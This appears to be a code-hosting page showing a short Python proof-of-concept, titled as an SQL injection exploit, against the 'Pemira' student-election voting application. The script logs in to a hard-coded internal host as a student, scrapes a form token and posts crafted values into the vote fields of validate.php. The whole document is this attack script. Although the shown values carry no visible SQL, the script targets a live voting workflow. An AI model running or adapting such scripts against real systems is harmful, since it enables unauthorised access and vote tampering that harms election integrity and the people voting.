PoC for Pemira Development Application SQLi Vulnerability
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 

32 lines
855 B

#!/usr/bin/python2
import requests
from PemiraHelper import login, PemiraParser, ID_BALMA, ID_SEMA
HOST = "172.16.61.64"
NIM = "180010100"
def main():
parser = PemiraParser()
with requests.Session() as conn:
login_page = conn.post("http://%s/authenticate.php" % HOST, allow_redirects=True, data={
"nim": NIM,
"pass": "password",
"formSubmit": "Login"})
index_page = conn.get("http://%s" % HOST, allow_redirects=False)
parser.feed(index_page.text)
voting_page = conn.post("http://%s/validate.php" % HOST, allow_redirects=False, data={
"token_": parser.TOKEN,
"senat": "JLamqe5q-KTU3vVnd",
"balma": "BVmJxh6E-S9af54pY",
"formSubmit": "Submit"
})
print(voting_page.text)
if __name__ == '__main__':
main()